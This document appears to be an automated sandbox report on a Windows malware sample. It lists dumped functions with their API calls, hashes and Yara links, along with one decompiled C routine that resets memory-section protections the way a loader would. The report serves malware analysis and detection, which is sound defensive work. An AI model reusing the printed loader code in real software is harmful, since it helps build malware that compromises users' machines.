                                                                                                                                        0x73752115
                                                                                                                                        0x737520bc
                                                                                                                                        0x737520c2
                                                                                                                                        0x737520c2
                                                                                                                                        0x737520d0
                                                                                                                                        0x737520d4
                                                                                                                                        0x737520db
                                                                                                                                        0x737520dd
                                                                                                                                        0x737520e5
                                                                                                                                        0x737520e9
                                                                                                                                        0x737520ef
                                                                                                                                        0x73752101
                                                                                                                                        0x737520f1
                                                                                                                                        0x737520f7
                                                                                                                                        0x737520fc
                                                                                                                                        0x737520ef
                                                                                                                                        0x7375210a
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,73754144,00000000), ref: 73752088
                                                                                                                                          • Part of subcall function 73751A17: EntryPoint.ONEROUS.TAR(?,00000000,?,?,00000000,-00000008,73751DE8), ref: 73751AA2
                                                                                                                                        • lstrlenW.KERNEL32(?,?,?), ref: 737520BC
                                                                                                                                          • Part of subcall function 737513E4: GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,737520D9,0000000A,?), ref: 737513F1
                                                                                                                                          • Part of subcall function 737513E4: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 73751407
                                                                                                                                          • Part of subcall function 737513E4: _snwprintf.NTDLL ref: 7375142C
                                                                                                                                          • Part of subcall function 737513E4: CreateFileMappingW.KERNELBASE(000000FF,73754140,00000004,00000000,?,?), ref: 73751451
                                                                                                                                          • Part of subcall function 737513E4: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,737520D9,0000000A), ref: 73751468
                                                                                                                                          • Part of subcall function 737513E4: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,737520D9), ref: 7375149D
                                                                                                                                        • memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 737520F7
                                                                                                                                        • ExitThread.KERNEL32 ref: 73752115
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DescriptorFileSecurityTime$CloseConvertCreateEntryErrorExitHandleLastMappingPoint.StringSystemThread_aulldiv_snwprintflstrlenmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 617961352-0
                                                                                                                                        • Opcode ID: 5b201e3b7882eecca9c9396c82516936c0745d8d76e809bfc70d92f4f5f91fd5
                                                                                                                                        • Instruction ID: c8b0d000d95ddf103c76dd2efa6eed829b18eb0aa26bdf7825d299e38ce2eaf8
                                                                                                                                        • Opcode Fuzzy Hash: 5b201e3b7882eecca9c9396c82516936c0745d8d76e809bfc70d92f4f5f91fd5
                                                                                                                                        • Instruction Fuzzy Hash: 2E1186B3504309ABEB09EB62CD89F8777FCBB54304F210519F549D7191EB38E5488B51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00441000, Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0046E088,00000000,004461B5,?,004426F5,?), ref: 0044101F
                                                                                                                                        • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0046E088,00000000,004461B5,?,004426F5,?), ref: 0044102A
                                                                                                                                        • _wcsupr.NTDLL ref: 00441037
                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 0044103F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2533608484-0
                                                                                                                                        • Opcode ID: f45770e146b75955b0a4d9cfdb4532775378a75c9b95312a5de4e76e383c3751
                                                                                                                                        • Instruction ID: 94e06660942a37fdadefd76641d463bd482c38fea51708cabe3f421a0301094e
                                                                                                                                        • Opcode Fuzzy Hash: f45770e146b75955b0a4d9cfdb4532775378a75c9b95312a5de4e76e383c3751
                                                                                                                                        • Instruction Fuzzy Hash: 85F0E9322011516FE7216B765CC9F6F56A9FBC1B95B10053FF900E2261DFACCC89816E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045D878, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0045D897
                                                                                                                                          • Part of subcall function 004489B7: RtlEnterCriticalSection.NTDLL(00000000), ref: 004489C3
                                                                                                                                          • Part of subcall function 004489B7: CloseHandle.KERNEL32(?), ref: 004489D1
                                                                                                                                          • Part of subcall function 004489B7: RtlLeaveCriticalSection.NTDLL(00000000), ref: 004489ED
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0045D8A5
                                                                                                                                        • InterlockedDecrement.KERNEL32(0046DF5C), ref: 0045D8B4
                                                                                                                                          • Part of subcall function 004454F0: SetEvent.KERNEL32(00000320,0045D8CF), ref: 004454FA
                                                                                                                                          • Part of subcall function 004454F0: CloseHandle.KERNEL32(00000320), ref: 0044550F
                                                                                                                                          • Part of subcall function 004454F0: HeapDestroy.KERNELBASE(037E0000), ref: 0044551F
                                                                                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 0045D8D0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1141245775-0
                                                                                                                                        • Opcode ID: 26e94bf2be6ee8a41633443304df456630f13be3a59139b3c090e69a2887235e
                                                                                                                                        • Instruction ID: e1e5acccdb1dd43bcdbecf726bed4450c52cb34eef8151369af9d85c92eac628
                                                                                                                                        • Opcode Fuzzy Hash: 26e94bf2be6ee8a41633443304df456630f13be3a59139b3c090e69a2887235e
                                                                                                                                        • Instruction Fuzzy Hash: DFF08130940604BBDB116B698C05B6A3778FF45721F11032EF926872D1EBB858058B6E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045AE71, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044E8F7: RegCreateKeyA.ADVAPI32(80000001,03BD8900,?), ref: 0044E90C
                                                                                                                                          • Part of subcall function 0044E8F7: lstrlen.KERNEL32(03BD8900,00000000,00000000,?,?,00461E90,00000000,?), ref: 0044E93A
                                                                                                                                        • RegQueryValueExA.KERNELBASE(00000000,Client,00000000,004535D4,0046D06C,004442B8,00000001,00000000,03BD8D64,0046D072,00000000,004535D4,03BD8D64,7742C740,00000000,004442B8), ref: 0045AEBC
                                                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 0045AF07
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateQueryValuelstrlen
                                                                                                                                        • String ID: Client
                                                                                                                                        • API String ID: 971780412-3236430179
                                                                                                                                        • Opcode ID: f5d3777f135677217a1442a6007d0bfd322f9e3feef4635b4a80639bdc26fbef
                                                                                                                                        • Instruction ID: ab9b9c8d777804e12363ec9f1a1d2479be83279e714d629aff2261d4ae5dd657
                                                                                                                                        • Opcode Fuzzy Hash: f5d3777f135677217a1442a6007d0bfd322f9e3feef4635b4a80639bdc26fbef
                                                                                                                                        • Instruction Fuzzy Hash: 512180B1E40208FFDB109B56DC05B9E7BB8EB04719F00417BF904AA251E7B85A46CF6E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045E38A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044E8F7: RegCreateKeyA.ADVAPI32(80000001,03BD8900,?), ref: 0044E90C
                                                                                                                                          • Part of subcall function 0044E8F7: lstrlen.KERNEL32(03BD8900,00000000,00000000,?,?,00461E90,00000000,?), ref: 0044E93A
                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,System,00000000,0044BA55,?,?,00000001,?,00000001,00000000,?,?,?,00000000,0044BA55), ref: 0045E3C8
                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,00000000,0044BA55), ref: 0045E41C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateQueryValuelstrlen
                                                                                                                                        • String ID: System
                                                                                                                                        • API String ID: 971780412-3470857405
                                                                                                                                        • Opcode ID: 9567f225f5d1efcd999e875e8c0c4d27b342c11f88307ebcea3a6a6e170ed860
                                                                                                                                        • Instruction ID: efdac91738b666af08414f75e8b839988ba332672dea95d8b1cf4c46aa921312
                                                                                                                                        • Opcode Fuzzy Hash: 9567f225f5d1efcd999e875e8c0c4d27b342c11f88307ebcea3a6a6e170ed860
                                                                                                                                        • Instruction Fuzzy Hash: 1C114F35D00118FFEF10DBA6DC05BDE7BB8FB45705F000076E900A6152E7B46A49DB59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00462D5E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E240), ref: 00462D68
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E240), ref: 00462DA4
                                                                                                                                          • Part of subcall function 0044106E: lstrlen.KERNEL32(?,?,?,?,00000000,?,00444163,?), ref: 004410BB
                                                                                                                                          • Part of subcall function 0044106E: VirtualProtect.KERNELBASE(00000000,00000000,00000040,00000200,?,?,?,00000000,?,00444163,?), ref: 004410CD
                                                                                                                                          • Part of subcall function 0044106E: lstrcpy.KERNEL32(00000000,?), ref: 004410DC
                                                                                                                                          • Part of subcall function 0044106E: VirtualProtect.KERNELBASE(00000000,00000000,00000200,00000200,?,?,?,00000000,?,00444163,?), ref: 004410ED
                                                                                                                                          • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                                                                                                                                        • String ID: 8F
                                                                                                                                        • API String ID: 1872894792-3652835401
                                                                                                                                        • Opcode ID: 50703be8bfce2daf1658356e10da9d6842a12303daa6fdf076fe6d1c0ecea4e3
                                                                                                                                        • Instruction ID: f8f52aee1f6b9ba4b4905855fd1595f6effaa9b54a3adc83ef054c64d2db6625
                                                                                                                                        • Opcode Fuzzy Hash: 50703be8bfce2daf1658356e10da9d6842a12303daa6fdf076fe6d1c0ecea4e3
                                                                                                                                        • Instruction Fuzzy Hash: BFF0A7792022149B87206F1ADD54C69B7DDEB55714315029FF94197310EBBA5C40C697
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00450EA4, Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 00450ECA
                                                                                                                                        • memcpy.NTDLL ref: 00450EF2
                                                                                                                                          • Part of subcall function 00461813: NtAllocateVirtualMemory.NTDLL([uE,00000000,00000000,[uE,00003000,00000040,?,?,?,0045755B), ref: 00461844
                                                                                                                                          • Part of subcall function 00461813: RtlNtStatusToDosError.NTDLL(00000000), ref: 0046184B
                                                                                                                                          • Part of subcall function 00461813: SetLastError.KERNEL32(00000000,?,?,?,0045755B), ref: 00461852
                                                                                                                                        • GetLastError.KERNEL32(00000010,00000218,00466B7D,00000100,?,00000318,00000008), ref: 00450F09
                                                                                                                                        • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,00466B7D,00000100), ref: 00450FEC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 685050087-0
                                                                                                                                        • Opcode ID: a9b4646cc1f08e9159ef6df77c51881bca5d7af6f03a17ebaba99903ea7bfd90
                                                                                                                                        • Instruction ID: d03be042b3c0b4bb35fe672fdaaed621bbd358b8a04a8e6fa1fd9dcac2e825f1
                                                                                                                                        • Opcode Fuzzy Hash: a9b4646cc1f08e9159ef6df77c51881bca5d7af6f03a17ebaba99903ea7bfd90
                                                                                                                                        • Instruction Fuzzy Hash: BB41A2B2504301AFD770DF25CC41B9BB7E8FB48315F00492EF998C6291E774D9188B6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 73751EDE, Relevance: 4.6, APIs: 3, Instructions: 69memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                        			E73751EDE(void* __eax, long __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				int _t33;
				signed int _t36;
				long _t41;
				void* _t50;
				void* _t51;
				signed int _t54;

				_t41 = __edx;
				_v12 = _v12 & 0x00000000;
				_t36 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t36;
				VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t36 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t41 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							asm("sbb edx, edx");
							_t41 = ( ~(_t41 & 0xffffff00 | __eflags > 0x00000000) & 0x00000002) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb edx, edx");
						_t41 = ( ~(_t41 & 0xffffff00 | _t54 > 0x00000000) & 0x00000020) + 0x20;
					}
					_t33 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t41,  &_v16); // executed
					if(_t33 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					if(_v8 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}













                                                                                                                                        0x73751ede
                                                                                                                                        0x73751ee8
                                                                                                                                        0x73751eed
                                                                                                                                        0x73751ef9
                                                                                                                                        0x73751f06
                                                                                                                                        0x73751f0c
                                                                                                                                        0x73751f0e
                                                                                                                                        0x73751f14
                                                                                                                                        0x73751f80
                                                                                                                                        0x73751f87
                                                                                                                                        0x73751f87
                                                                                                                                        0x73751f16
                                                                                                                                        0x73751f19
                                                                                                                                        0x73751f19
                                                                                                                                        0x73751f1d
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73751f1f
                                                                                                                                        0x73751f23
                                                                                                                                        0x73751f38
                                                                                                                                        0x73751f3c
                                                                                                                                        0x73751f52
                                                                                                                                        0x73751f3e
                                                                                                                                        0x73751f3e
                                                                                                                                        0x73751f47
                                                                                                                                        0x73751f4d
                                                                                                                                        0x73751f4d
                                                                                                                                        0x73751f25
                                                                                                                                        0x73751f25
                                                                                                                                        0x73751f2e
                                                                                                                                        0x73751f33
                                                                                                                                        0x73751f33
                                                                                                                                        0x73751f63
                                                                                                                                        0x73751f67
                                                                                                                                        0x73751f6f
                                                                                                                                        0x73751f6f
                                                                                                                                        0x73751f72
                                                                                                                                        0x73751f75
                                                                                                                                        0x73751f7e
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73751f7e
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 73751F0C
                                                                                                                                        • VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 73751F63
                                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 73751F69
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1469625949-0
                                                                                                                                        • Opcode ID: 469155247b6020d75ad0ad1df8ffc78bd51cf6cd3a3ef004a8e005fdd60509c8
                                                                                                                                        • Instruction ID: 2861e5021454eb5c67247a0ac0ccfab1f3326343a040b6eb2a4ea2ec0bf53b08
                                                                                                                                        • Opcode Fuzzy Hash: 469155247b6020d75ad0ad1df8ffc78bd51cf6cd3a3ef004a8e005fdd60509c8
                                                                                                                                        • Instruction Fuzzy Hash: 3C210273900209EFEF158F89D880FADB3B9FB4035AF248049F540A7182E3749A89CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044BEF2, Relevance: 4.5, APIs: 3, Instructions: 49memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,00000000,?,?,?,00459CC3,?,?,?,?,00000000,0046A578,00000018,0045EBA1,00000000,?), ref: 0044BF24
                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000004,00000040,00000000,?,00000000,?,?,?,00459CC3,?,?,?,?,00000000,0046A578), ref: 0044BF3E
                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,?,?,?,00459CC3,?,?,?,?,00000000,0046A578,00000018,0045EBA1), ref: 0044BF71
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual$lstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 386137988-0
                                                                                                                                        • Opcode ID: 1bbc88560e1e239290e62a3a5b336ee4ef42da757272e21acbedd96a81772796
                                                                                                                                        • Instruction ID: be4d9ee21c20da10a6a8216e99271ab0ca1e9d2923c27e501b6cad12531dd1cd
                                                                                                                                        • Opcode Fuzzy Hash: 1bbc88560e1e239290e62a3a5b336ee4ef42da757272e21acbedd96a81772796
                                                                                                                                        • Instruction Fuzzy Hash: 86112E75901208FFEB10CF54C885F9EBBB8EF04755F108199FD0896211D3B8DA859BE9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044E8F7, Relevance: 4.5, APIs: 3, Instructions: 39registrystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,03BD8900,?), ref: 0044E90C
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,03BD8900,?), ref: 0044E919
                                                                                                                                        • lstrlen.KERNEL32(03BD8900,00000000,00000000,?,?,00461E90,00000000,?), ref: 0044E93A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateOpenlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2865187142-0
                                                                                                                                        • Opcode ID: 37a2faea5783947838b1a6bddde04c610438300df2576fa1a6315c4842e325f2
                                                                                                                                        • Instruction ID: 7c6ce866e468e09438cbfba813f69ad38f56582faa2aa1b434a657b4d210ac99
                                                                                                                                        • Opcode Fuzzy Hash: 37a2faea5783947838b1a6bddde04c610438300df2576fa1a6315c4842e325f2
                                                                                                                                        • Instruction Fuzzy Hash: FAF062B5904208BFFB109F51DC88EAB7BACEB45354F10412AFD4582250E6749A40C7A9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004300E3, Relevance: 4.5, APIs: 3, Instructions: 39filememoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • UnmapViewOfFile.KERNEL32(00430440,?,00430440,?,0043002D,00430440,?,00430440), ref: 00430119
                                                                                                                                        • VirtualFree.KERNELBASE(00430440,00000000,00008000,?,00430440,?,0043002D,00430440,?,00430440), ref: 00430127
                                                                                                                                        • VirtualAlloc.KERNELBASE(00430440,?,00003000,00000040,?,00430440,?,0043002D,00430440,?,00430440), ref: 00430139
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000003.202248028.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$AllocFileFreeUnmapView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3711693493-0
                                                                                                                                        • Opcode ID: 52797b44c187e508bc199d309972fc3d2aa68249d6ffe84740fcb2371e9786b2
                                                                                                                                        • Instruction ID: cb57eb1f2dc795ff73d19b7887786a642dc00afecfe09ef0063f869e4c4d6973
                                                                                                                                        • Opcode Fuzzy Hash: 52797b44c187e508bc199d309972fc3d2aa68249d6ffe84740fcb2371e9786b2
                                                                                                                                        • Instruction Fuzzy Hash: 52F06831240300ABDB209B15CC49BBB7778EFC9B54F184169FD456B645C774F802C769
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004450BE, Relevance: 4.5, APIs: 3, Instructions: 33COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,0045840E,0046E088,?,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450D9
                                                                                                                                        • IsWow64Process.KERNEL32(00000000,00000000,0046E088,?,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450EA
                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450FD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$ChangeCloseFindNotificationOpenWow64
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3805842350-0
                                                                                                                                        • Opcode ID: 0cfca0ab48fb12453a53661ffdcf369ea2af43f7734f5247d6c4db3fa6b48ae7
                                                                                                                                        • Instruction ID: e57c7ac610f52a6e215738570f827ddbcfc46e521ec8d05018e4601402ed5c85
                                                                                                                                        • Opcode Fuzzy Hash: 0cfca0ab48fb12453a53661ffdcf369ea2af43f7734f5247d6c4db3fa6b48ae7
                                                                                                                                        • Instruction Fuzzy Hash: CCF0BE36900514FBDB219F59DC0499FBBB8EB80790B11812AF904A2200E6744E40CBA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004454F0, Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetEvent.KERNEL32(00000320,0045D8CF), ref: 004454FA
                                                                                                                                          • Part of subcall function 0044AB47: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,00445505), ref: 0044AB70
                                                                                                                                          • Part of subcall function 0044AB47: RtlDeleteCriticalSection.NTDLL(0046E220), ref: 0044ABA3
                                                                                                                                          • Part of subcall function 0044AB47: RtlDeleteCriticalSection.NTDLL(0046E240), ref: 0044ABAA
                                                                                                                                          • Part of subcall function 0044AB47: CloseHandle.KERNEL32(?,?,00445505), ref: 0044ABD9
                                                                                                                                          • Part of subcall function 0044AB47: ReleaseMutex.KERNEL32(00000324,00000000,?,?,?,00445505), ref: 0044ABEA
                                                                                                                                          • Part of subcall function 0044AB47: FindCloseChangeNotification.KERNELBASE(?,?,00445505), ref: 0044ABF6
                                                                                                                                          • Part of subcall function 0044AB47: ResetEvent.KERNEL32(00000000,00000000,?,?,?,00445505), ref: 0044AC02
                                                                                                                                          • Part of subcall function 0044AB47: CloseHandle.KERNEL32(?,?,00445505), ref: 0044AC0E
                                                                                                                                          • Part of subcall function 0044AB47: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,00445505), ref: 0044AC14
                                                                                                                                          • Part of subcall function 0044AB47: SleepEx.KERNEL32(00000064,00000001,?,?,00445505), ref: 0044AC28
                                                                                                                                          • Part of subcall function 0044AB47: HeapFree.KERNEL32(00000000,00000000,?,?,00445505), ref: 0044AC4B
                                                                                                                                          • Part of subcall function 0044AB47: RtlRemoveVectoredExceptionHandler.NTDLL(00644280), ref: 0044AC84
                                                                                                                                        • CloseHandle.KERNEL32(00000320), ref: 0044550F
                                                                                                                                        • HeapDestroy.KERNELBASE(037E0000), ref: 0044551F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$HandleSleep$CriticalDeleteEventHeapSection$ChangeDestroyExceptionFindFreeHandlerMutexNotificationReleaseRemoveResetVectored
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 891263893-0
                                                                                                                                        • Opcode ID: d76be319d152245e0e68b91ca23121ddbf3cd7312b9563856cd1ccf62d604eb5
                                                                                                                                        • Instruction ID: aa3b984d9eb7676fec0be5f42f4e919d735aa2026a9f21996af7dd56e1a12f86
                                                                                                                                        • Opcode Fuzzy Hash: d76be319d152245e0e68b91ca23121ddbf3cd7312b9563856cd1ccf62d604eb5
                                                                                                                                        • Instruction Fuzzy Hash: 17E012B070020197EF006B31EC4CE1777D9AB043053090839F405C6265FFB8E888DA2F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00445907, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 61memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513A8
                                                                                                                                          • Part of subcall function 00451370: RtlAllocateHeap.NTDLL(00000000,?), ref: 004513BC
                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513D6
                                                                                                                                          • Part of subcall function 00451370: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,004431E8,Kill,?,?), ref: 00451400
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,Ini,?,?), ref: 00445995
                                                                                                                                          • Part of subcall function 00444E37: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,00454799,?,00000001,004683E0,?,?,?,00000000), ref: 00444E59
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapQueryValue$AllocateCloseFreememcpy
                                                                                                                                        • String ID: Ini
                                                                                                                                        • API String ID: 1301464996-1327165576
